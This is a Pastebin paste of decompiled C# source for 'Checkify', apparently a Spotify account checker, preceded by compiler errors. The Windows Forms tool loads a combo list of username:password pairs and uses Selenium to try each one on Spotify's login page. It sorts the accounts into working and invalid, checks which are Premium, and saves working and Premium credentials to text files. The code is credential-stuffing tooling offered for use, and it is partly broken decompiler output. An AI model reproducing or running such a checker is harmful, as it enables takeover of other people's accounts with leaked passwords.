Advertisement
Guest User

oh yes daddy its so FUCKING BAD

a guest
Jun 18th, 2017
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.23 KB | None | 0 0
  1. Errors:
  2. ------ Compile started: C:\WINDOWS\Microsoft.NET\Framework\v3.5\csc.exe /t:library /nologo "Form1.cs"
  3. Form1.cs(100,21): error CS1002: ; expected
  4. Form1.cs(124,32): error CS1003: Syntax error, '(' expected
  5. Form1.cs(124,38): error CS1001: Identifier expected
  6. Form1.cs(127,4): error CS1519: Invalid token 'if' in class, struct, or interface member declaration
  7. Form1.cs(127,32): error CS1519: Invalid token '(' in class, struct, or interface member declaration
  8. Form1.cs(128,12): error CS1519: Invalid token '=' in class, struct, or interface member declaration
  9. Form1.cs(128,25): error CS1519: Invalid token '(' in class, struct, or interface member declaration
  10. Form1.cs(129,6): error CS0116: A namespace does not directly contain members such as fields or methods
  11. Form1.cs(130,18): error CS1518: Expected class, delegate, enum, interface, or struct
  12. Form1.cs(131,6): error CS0116: A namespace does not directly contain members such as fields or methods
  13. Form1.cs(135,3): error CS1022: Type or namespace definition, or end-of-file expected
  14. ------ Compile complete: Process returned 1
  15.  
  16. ___________
  17. Form1.cs ||
  18. _________||
  19.  
  20. using OpenQA.Selenium;
  21. using OpenQA.Selenium.Chrome;
  22. using System;
  23. using System.Collections;
  24. using System.Collections.Generic;
  25. using System.ComponentModel;
  26. using System.Drawing;
  27. using System.IO;
  28. using System.Runtime.InteropServices;
  29. using System.Threading;
  30. using System.Threading.Tasks;
  31. using System.Windows.Forms;
  32.  
  33. namespace Spotify_Account_Checker {
  34. public class Form1: Form {
  35. private IWebDriver driver = new ChromeDriver();
  36.  
  37. private
  38. const int SW_HIDE = 0;
  39.  
  40. private
  41. const int SW_SHOW = 5;
  42.  
  43. private IContainer components;
  44.  
  45. private Button button1;
  46.  
  47. private Button button2;
  48.  
  49. private GroupBox groupBox1;
  50.  
  51. private ListBox listBox1;
  52.  
  53. private Button button4;
  54.  
  55. private GroupBox groupBox2;
  56.  
  57. private GroupBox groupBox3;
  58.  
  59. private GroupBox groupBox4;
  60.  
  61. private Label label4;
  62.  
  63. private Label label3;
  64.  
  65. private Label label2;
  66.  
  67. private Label label1;
  68.  
  69. private ProgressBar progressBar1;
  70.  
  71. private Button button5;
  72.  
  73. private ListBox listBox2;
  74.  
  75. private ListBox listBox3;
  76.  
  77. private Label label6;
  78.  
  79. private Label label5;
  80.  
  81. private CheckBox checkBox1;
  82.  
  83. private ListView listView1;
  84.  
  85. private ColumnHeader columnHeader1;
  86.  
  87. private ColumnHeader columnHeader2;
  88.  
  89. private Button button3;
  90.  
  91. private Button button6;
  92.  
  93. public Form1() {
  94. this.InitializeComponent();
  95. }
  96.  
  97. private void button1_Click(object sender, EventArgs e) {
  98. try {
  99. OpenFileDialog openFileDialog = new OpenFileDialog();
  100. if (openFileDialog.ShowDialog() == DialogResult.OK) {
  101. this.listBox1.Items.Clear();
  102. new List < string > ();
  103. using(StreamReader streamReader = new StreamReader(openFileDialog.OpenFile())) {
  104. string item;
  105. while ((item = streamReader.ReadLine()) != null) {
  106. this.listBox1.Items.Add(item);
  107. }
  108. }
  109. }
  110. int count = this.listBox1.Items.Count;
  111. this.label2.Text = "0/" + count;
  112. this.progressBar1.Maximum = count;
  113. Console.WriteLine("Successfully Imported the list!");
  114. } catch (Exception arg) {
  115. Console.WriteLine("An error occurred when importing the list. '{0}'", arg);
  116. }
  117. }
  118.  
  119. public async Task login(string user, string password) {
  120. Console.WriteLine("Loading Spotify Login Page");
  121. this.driver.Manage().Cookies.DeleteAllCookies();
  122. this.driver.Navigate().GoToUrl("https://accounts.spotify.com/en/login");
  123. Console.WriteLine("Waiting for page load...");
  124. this.driver.Manage().Timeouts().ImplicitlyWait(TimeSpan.FromSeconds(30.0));
  125. Console.WriteLine("Page successfully loaded!");
  126. Console.WriteLine("Begin check");
  127. Console.WriteLine("Sending " + user + " to browser");
  128. this.driver.FindElement(By.Id("login-username")).Clear();
  129. this.driver.FindElement(By.Id("login-username")).SendKeys(user);
  130. Thread.Sleep(200);
  131. Console.WriteLine("Sending " + password + " to browser");
  132. this.driver.FindElement(By.Id("login-password")).Clear();
  133. this.driver.FindElement(By.Id("login-password")).SendKeys(password);
  134. Thread.Sleep(200);
  135. Console.WriteLine("Submitting Login...");
  136. this.driver.FindElement(By.Id("login-password")).SendKeys(OpenQA.Selenium.Keys.Enter);
  137. Thread.Sleep(1000);
  138. Console.WriteLine("Waiting for page load...");
  139. this.driver.Manage().Timeouts().ImplicitlyWait(TimeSpan.FromSeconds(30.0));
  140. Console.WriteLine("Page loaded, checking if successfull");
  141. }
  142.  
  143. public async Task < bool ? > check_() {
  144. IWebElement webElement = this.driver.FindElement(By.TagName("body"));
  145. bool ? result;
  146. if (webElement.Text.Contains("Incorrect")) {
  147. result = new bool ? (false);
  148. } else if (webElement.Text.Contains("logged")) {
  149. result = new bool ? (true);
  150. } else {
  151. result = null;
  152. }
  153. return result;
  154. }
  155.  
  156. public async Task < bool ? > isPremium() {
  157. this.driver.Navigate().GoToUrl("https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fau%2Faccount%2Foverview%2F");
  158. this.driver.Manage().Timeouts().ImplicitlyWait(TimeSpan.FromSeconds(30.0));
  159. IWebElement webElement = this.driver.FindElement(By.ClassName("product-name"));
  160. bool ? result;
  161. if (webElement.Text.Contains("Free")) {
  162. result = new bool ? (false);
  163. } else if (webElement.Text.Contains("Premium")) {
  164. result = new bool ? (true);
  165. } else if (webElement.Text.Contains("Premium")) {
  166. result = new bool ? (true);
  167. } else {
  168. result = null;
  169. }
  170. return result;
  171. }
  172.  
  173. private async void button2_Click(object sender, EventArgs e) {
  174. this.button2.Enabled = false;
  175. this.checkBox1.Enabled = false;
  176. int count = this.listBox1.Items.Count;
  177. int num = 0;
  178. this.label2.Text = "0/" + count;
  179. this.progressBar1.Maximum = count;
  180. int num2 = 0;
  181. IEnumerator enumerator = this.listBox1.Items.GetEnumerator();
  182. try {
  183. while (enumerator.MoveNext()) {
  184. string text = (string) enumerator.Current;
  185. Form1. < > c__DisplayClass6_0 < > c__DisplayClass6_ = new Form1. < > c__DisplayClass6_0(); < > c__DisplayClass6_. < > 4 __this = this;
  186. bool ? flag;
  187. while (true) { < > c__DisplayClass6_.user = text.Split(new string[] {
  188. ":"
  189. }, StringSplitOptions.None);
  190. this.label5.Text = < > c__DisplayClass6_.user[0];
  191. this.label6.Text = < > c__DisplayClass6_.user[1];
  192. await Task.Run(() => < > c__DisplayClass6_. < > 4 __this.login( < > c__DisplayClass6_.user[0], < > c__DisplayClass6_.user[1]));
  193. flag = await Task.Run < bool ? > (() => this.check_());
  194. if (flag == true) {
  195. goto Block_4;
  196. }
  197. if (flag == false) {
  198. goto Block_6;
  199. }
  200. if (flag.HasValue) {
  201. break;
  202. }
  203. if (num2 >= 5) {
  204. goto Block_8;
  205. }
  206. Console.ForegroundColor = ConsoleColor.Red;
  207. Console.WriteLine("Cannot Determine, Rechecking... (" + num2 + ")");
  208. Console.ResetColor();
  209. num2++;
  210. }
  211. IL_3BD:
  212. if (this.checkBox1.Checked && flag == true) {
  213. int num3 = 0;
  214. while (true) {
  215. Console.WriteLine("Checking premium status...");
  216. bool ? var_6_476 = await Task.Run < bool ? > (() => this.isPremium());
  217. if (var_6_476 == true) {
  218. break;
  219. }
  220. if (var_6_476 == false) {
  221. goto Block_15;
  222. }
  223. if (var_6_476.HasValue) {
  224. goto IL_5E9;
  225. }
  226. if (num2 >= 5) {
  227. goto Block_17;
  228. }
  229. Console.ForegroundColor = ConsoleColor.Red;
  230. Console.WriteLine("Cannot determine status. Rechecking. (" + num3 + ")");
  231. Console.ResetColor();
  232. num3++;
  233. }
  234. Console.WriteLine(text + " is a premium account");
  235. this.listView1.Items.Add(text).SubItems.Add("Premium");
  236. goto IL_5E9;
  237. Block_15:
  238. Console.WriteLine(text + " is a free account");
  239. this.listView1.Items.Add(text).SubItems.Add("Free");
  240. goto IL_5E9;
  241. Block_17:
  242. Console.ForegroundColor = ConsoleColor.Red;
  243. Console.WriteLine("Maximum retries reached. Assumming account is not free.");
  244. Console.ResetColor();
  245. Console.WriteLine(text + " is a free account");
  246. this.listView1.Items.Add(text).SubItems.Add("Free");
  247. }
  248. IL_5E9:
  249. num++;
  250. this.progressBar1.Value = num;
  251. this.label2.Text = num + "/" + count;
  252. this.groupBox2.Text = "Working (" + this.listBox2.Items.Count + ")";
  253. this.groupBox3.Text = " Not Working (" + this.listBox3.Items.Count + ")"; < > c__DisplayClass6_ = null;
  254. text = null;
  255. continue;
  256. Block_4:
  257. Console.ForegroundColor = ConsoleColor.Green;
  258. Console.WriteLine( < > c__DisplayClass6_.user[0] + " " + < > c__DisplayClass6_.user[1] + " is a working account");
  259. Console.ResetColor();
  260. this.listBox2.Items.Add(text);
  261. goto IL_3BD;
  262. Block_6:
  263. Console.ForegroundColor = ConsoleColor.DarkYellow;
  264. Console.WriteLine( < > c__DisplayClass6_.user[0] + " " + < > c__DisplayClass6_.user[1] + "is not working");
  265. Console.ResetColor();
  266. this.listBox3.Items.Add(text);
  267. goto IL_3BD;
  268. Block_8:
  269. Console.ForegroundColor = ConsoleColor.Red;
  270. Console.WriteLine("Maximum retries reached. Assumming account is not valid.");
  271. Console.ResetColor();
  272. this.listBox3.Items.Add(text);
  273. goto IL_3BD;
  274. }
  275. } finally {
  276. int num4;
  277. if (num4 < 0) {
  278. IDisposable var_7_6DE = enumerator as IDisposable;
  279. if (var_7_6DE != null) {
  280. var_7_6DE.Dispose();
  281. }
  282. }
  283. }
  284. enumerator = null;
  285. MessageBox.Show(string.Concat(new object[] {
  286. "Check Completed. Have found ",
  287. this.listBox2.Items.Count,
  288. " working accounts and ",
  289. this.listBox3.Items.Count,
  290. " invalid accounts"
  291. }));
  292. this.progressBar1.Value = 0;
  293. this.label2.Text = "0/" + count;
  294. this.button2.Enabled = true;
  295. this.checkBox1.Enabled = true;
  296. }
  297.  
  298. public static void ShowConsoleWindow() {
  299. IntPtr consoleWindow = Form1.GetConsoleWindow();
  300. if (consoleWindow == IntPtr.Zero) {
  301. Form1.AllocConsole();
  302. return;
  303. }
  304. Form1.ShowWindow(consoleWindow, 5);
  305. }
  306.  
  307. public static void HideConsoleWindow() {
  308. Form1.ShowWindow(Form1.GetConsoleWindow(), 0);
  309. }
  310.  
  311. [DllImport("kernel32.dll", SetLastError = true)]
  312. private static extern bool AllocConsole();
  313.  
  314. [DllImport("kernel32.dll")]
  315. private static extern IntPtr GetConsoleWindow();
  316.  
  317. [DllImport("user32.dll")]
  318. private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
  319.  
  320. private void Form1_Load(object sender, EventArgs e) {
  321. Form1.ShowConsoleWindow();
  322. Console.WriteLine("Application Successfully Loaded!");
  323. }
  324.  
  325. private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
  326. this.driver.Quit();
  327. }
  328.  
  329. private void button5_Click(object sender, EventArgs e) {
  330. SaveFileDialog saveFileDialog = new SaveFileDialog();
  331. saveFileDialog.Filter = "Text (*.txt)|*.txt";
  332. if (saveFileDialog.ShowDialog() == DialogResult.OK) {
  333. using(StreamWriter streamWriter = new StreamWriter(saveFileDialog.FileName, false)) {
  334. foreach(object current in this.listBox2.Items) {
  335. streamWriter.Write(current.ToString() + Environment.NewLine);
  336. }
  337. }
  338. }
  339. }
  340.  
  341. private void button4_Click(object sender, EventArgs e) {
  342. this.listBox1.Items.Clear();
  343. }
  344.  
  345. private void checkBox1_CheckedChanged(object sender, EventArgs e) {}
  346.  
  347. private void button3_Click(object sender, EventArgs e) {
  348. SaveFileDialog saveFileDialog = new SaveFileDialog();
  349. saveFileDialog.Filter = "Text (*.txt)|*.txt";
  350. if (saveFileDialog.ShowDialog() == DialogResult.OK) {
  351. using(StreamWriter streamWriter = new StreamWriter(saveFileDialog.FileName, false)) {
  352. foreach(ListViewItem listViewItem in this.listView1.Items) {
  353. for (int i = 1; i < listViewItem.SubItems.Count; i++) {
  354. if (listViewItem.SubItems[i].Text == "Premium") {
  355. streamWriter.Write(listViewItem.Text);
  356. streamWriter.Write(Environment.NewLine);
  357. }
  358. }
  359. }
  360. }
  361. }
  362. }
  363.  
  364. private void button6_Click(object sender, EventArgs e) {
  365. SaveFileDialog saveFileDialog = new SaveFileDialog();
  366. saveFileDialog.Filter = "Text (*.txt)|*.txt";
  367. if (saveFileDialog.ShowDialog() == DialogResult.OK) {
  368. using(StreamWriter streamWriter = new StreamWriter(saveFileDialog.FileName, false)) {
  369. foreach(ListViewItem listViewItem in this.listView1.Items) {
  370. for (int i = 1; i < listViewItem.SubItems.Count; i++) {
  371. if (listViewItem.SubItems[i].Text == "Free") {
  372. streamWriter.Write(listViewItem.Text);
  373. streamWriter.Write(Environment.NewLine);
  374. }
  375. }
  376. }
  377. }
  378. }
  379. }
  380.  
  381. protected override void Dispose(bool disposing) {
  382. if (disposing && this.components != null) {
  383. this.components.Dispose();
  384. }
  385. base.Dispose(disposing);
  386. }
  387.  
  388. private void InitializeComponent() {
  389. this.button1 = new Button();
  390. this.button2 = new Button();
  391. this.groupBox1 = new GroupBox();
  392. this.listBox1 = new ListBox();
  393. this.button4 = new Button();
  394. this.groupBox2 = new GroupBox();
  395. this.button5 = new Button();
  396. this.listBox2 = new ListBox();
  397. this.groupBox3 = new GroupBox();
  398. this.listBox3 = new ListBox();
  399. this.groupBox4 = new GroupBox();
  400. this.label6 = new Label();
  401. this.label5 = new Label();
  402. this.label4 = new Label();
  403. this.label3 = new Label();
  404. this.label2 = new Label();
  405. this.label1 = new Label();
  406. this.progressBar1 = new ProgressBar();
  407. this.checkBox1 = new CheckBox();
  408. this.listView1 = new ListView();
  409. this.columnHeader1 = new ColumnHeader();
  410. this.columnHeader2 = new ColumnHeader();
  411. this.button3 = new Button();
  412. this.button6 = new Button();
  413. this.groupBox1.SuspendLayout();
  414. this.groupBox2.SuspendLayout();
  415. this.groupBox3.SuspendLayout();
  416. this.groupBox4.SuspendLayout();
  417. base.SuspendLayout();
  418. this.button1.Location = new Point(12, 12);
  419. this.button1.Name = "button1";
  420. this.button1.Size = new Size(209, 53);
  421. this.button1.TabIndex = 0;
  422. this.button1.Text = "Import Combo List";
  423. this.button1.UseVisualStyleBackColor = true;
  424. this.button1.Click += new EventHandler(this.button1_Click);
  425. this.button2.Location = new Point(228, 12);
  426. this.button2.Name = "button2";
  427. this.button2.Size = new Size(412, 53);
  428. this.button2.TabIndex = 1;
  429. this.button2.Text = "Start Check";
  430. this.button2.UseVisualStyleBackColor = true;
  431. this.button2.Click += new EventHandler(this.button2_Click);
  432. this.groupBox1.Controls.Add(this.listBox1);
  433. this.groupBox1.Location = new Point(12, 71);
  434. this.groupBox1.Name = "groupBox1";
  435. this.groupBox1.Size = new Size(640, 279);
  436. this.groupBox1.TabIndex = 3;
  437. this.groupBox1.TabStop = false;
  438. this.groupBox1.Text = "Combo list";
  439. this.listBox1.FormattingEnabled = true;
  440. this.listBox1.ItemHeight = 25;
  441. this.listBox1.Location = new Point(6, 30);
  442. this.listBox1.Name = "listBox1";
  443. this.listBox1.Size = new Size(628, 179);
  444. this.listBox1.TabIndex = 4;
  445. this.button4.Location = new Point(18, 286);
  446. this.button4.Name = "button4";
  447. this.button4.Size = new Size(628, 58);
  448. this.button4.TabIndex = 4;
  449. this.button4.Text = "Clear Items";
  450. this.button4.UseVisualStyleBackColor = true;
  451. this.button4.Click += new EventHandler(this.button4_Click);
  452. this.groupBox2.Controls.Add(this.button5);
  453. this.groupBox2.Controls.Add(this.listBox2);
  454. this.groupBox2.Location = new Point(12, 356);
  455. this.groupBox2.Name = "groupBox2";
  456. this.groupBox2.Size = new Size(640, 279);
  457. this.groupBox2.TabIndex = 5;
  458. this.groupBox2.TabStop = false;
  459. this.groupBox2.Text = "Working";
  460. this.button5.Location = new Point(12, 215);
  461. this.button5.Name = "button5";
  462. this.button5.Size = new Size(622, 58);
  463. this.button5.TabIndex = 8;
  464. this.button5.Text = "Save working accounts to text file.";
  465. this.button5.UseVisualStyleBackColor = true;
  466. this.button5.Click += new EventHandler(this.button5_Click);
  467. this.listBox2.FormattingEnabled = true;
  468. this.listBox2.ItemHeight = 25;
  469. this.listBox2.Location = new Point(12, 30);
  470. this.listBox2.Name = "listBox2";
  471. this.listBox2.Size = new Size(622, 179);
  472. this.listBox2.TabIndex = 5;
  473. this.groupBox3.Controls.Add(this.listBox3);
  474. this.groupBox3.Location = new Point(12, 641);
  475. this.groupBox3.Name = "groupBox3";
  476. this.groupBox3.Size = new Size(640, 279);
  477. this.groupBox3.TabIndex = 6;
  478. this.groupBox3.TabStop = false;
  479. this.groupBox3.Text = "Not Working";
  480. this.listBox3.FormattingEnabled = true;
  481. this.listBox3.ItemHeight = 25;
  482. this.listBox3.Location = new Point(6, 30);
  483. this.listBox3.Name = "listBox3";
  484. this.listBox3.Size = new Size(622, 229);
  485. this.listBox3.TabIndex = 6;
  486. this.groupBox4.Controls.Add(this.label6);
  487. this.groupBox4.Controls.Add(this.label5);
  488. this.groupBox4.Controls.Add(this.label4);
  489. this.groupBox4.Controls.Add(this.label3);
  490. this.groupBox4.Controls.Add(this.label2);
  491. this.groupBox4.Controls.Add(this.label1);
  492. this.groupBox4.Controls.Add(this.progressBar1);
  493. this.groupBox4.Location = new Point(658, 12);
  494. this.groupBox4.Name = "groupBox4";
  495. this.groupBox4.Size = new Size(470, 338);
  496. this.groupBox4.TabIndex = 7;
  497. this.groupBox4.TabStop = false;
  498. this.groupBox4.Text = "Status";
  499. this.label6.AutoSize = true;
  500. this.label6.Location = new Point(129, 100);
  501. this.label6.Name = "label6";
  502. this.label6.Size = new Size(30, 25);
  503. this.label6.TabIndex = 6;
  504. this.label6.Text = "...";
  505. this.label5.AutoSize = true;
  506. this.label5.Location = new Point(129, 59);
  507. this.label5.Name = "label5";
  508. this.label5.Size = new Size(30, 25);
  509. this.label5.TabIndex = 5;
  510. this.label5.Text = "...";
  511. this.label4.AutoSize = true;
  512. this.label4.Location = new Point(6, 100);
  513. this.label4.Name = "label4";
  514. this.label4.Size = new Size(112, 25);
  515. this.label4.TabIndex = 4;
  516. this.label4.Text = "Password:";
  517. this.label3.AutoSize = true;
  518. this.label3.Location = new Point(6, 59);
  519. this.label3.Name = "label3";
  520. this.label3.Size = new Size(116, 25);
  521. this.label3.TabIndex = 3;
  522. this.label3.Text = "Username:";
  523. this.label2.Location = new Point(364, 254);
  524. this.label2.Name = "label2";
  525. this.label2.RightToLeft = RightToLeft.No;
  526. this.label2.Size = new Size(100, 23);
  527. this.label2.TabIndex = 2;
  528. this.label2.Text = "0/0";
  529. this.label2.TextAlign = ContentAlignment.MiddleRight;
  530. this.label1.AutoSize = true;
  531. this.label1.Location = new Point(6, 27);
  532. this.label1.Name = "label1";
  533. this.label1.Size = new Size(201, 25);
  534. this.label1.TabIndex = 1;
  535. this.label1.Text = "Currently Checking:";
  536. this.progressBar1.Location = new Point(6, 280);
  537. this.progressBar1.Name = "progressBar1";
  538. this.progressBar1.Size = new Size(458, 42);
  539. this.progressBar1.TabIndex = 0;
  540. this.checkBox1.AutoSize = true;
  541. this.checkBox1.Location = new Point(761, 372);
  542. this.checkBox1.Name = "checkBox1";
  543. this.checkBox1.Size = new Size(274, 29);
  544. this.checkBox1.TabIndex = 8;
  545. this.checkBox1.Text = "Premium Status Checker";
  546. this.checkBox1.UseVisualStyleBackColor = true;
  547. this.checkBox1.CheckedChanged += new EventHandler(this.checkBox1_CheckedChanged);
  548. this.listView1.Columns.AddRange(new ColumnHeader[] {
  549. this.columnHeader1,
  550. this.columnHeader2
  551. });
  552. this.listView1.Location = new Point(669, 421);
  553. this.listView1.Name = "listView1";
  554. this.listView1.Size = new Size(453, 428);
  555. this.listView1.TabIndex = 9;
  556. this.listView1.UseCompatibleStateImageBehavior = false;
  557. this.listView1.View = View.Details;
  558. this.columnHeader1.Text = "Account";
  559. this.columnHeader1.Width = 154;
  560. this.columnHeader2.Text = "Status";
  561. this.columnHeader2.Width = 244;
  562. this.button3.Location = new Point(669, 855);
  563. this.button3.Name = "button3";
  564. this.button3.Size = new Size(227, 55);
  565. this.button3.TabIndex = 10;
  566. this.button3.Text = "Save Premium";
  567. this.button3.UseVisualStyleBackColor = true;
  568. this.button3.Click += new EventHandler(this.button3_Click);
  569. this.button6.Location = new Point(902, 855);
  570. this.button6.Name = "button6";
  571. this.button6.Size = new Size(220, 55);
  572. this.button6.TabIndex = 11;
  573. this.button6.Text = "Save Free";
  574. this.button6.UseVisualStyleBackColor = true;
  575. this.button6.Click += new EventHandler(this.button6_Click);
  576. base.AutoScaleDimensions = new SizeF(12 f, 25 f);
  577. base.AutoScaleMode = AutoScaleMode.Font;
  578. base.ClientSize = new Size(1140, 933);
  579. base.Controls.Add(this.button6);
  580. base.Controls.Add(this.button3);
  581. base.Controls.Add(this.listView1);
  582. base.Controls.Add(this.checkBox1);
  583. base.Controls.Add(this.groupBox4);
  584. base.Controls.Add(this.groupBox3);
  585. base.Controls.Add(this.groupBox2);
  586. base.Controls.Add(this.button4);
  587. base.Controls.Add(this.groupBox1);
  588. base.Controls.Add(this.button2);
  589. base.Controls.Add(this.button1);
  590. base.Name = "Form1";
  591. this.Text = "Checkify by Paz (for Spotify)";
  592. base.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
  593. base.Load += new EventHandler(this.Form1_Load);
  594. this.groupBox1.ResumeLayout(false);
  595. this.groupBox2.ResumeLayout(false);
  596. this.groupBox3.ResumeLayout(false);
  597. this.groupBox4.ResumeLayout(false);
  598. this.groupBox4.PerformLayout();
  599. base.ResumeLayout(false);
  600. base.PerformLayout();
  601. }
  602. }
  603. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement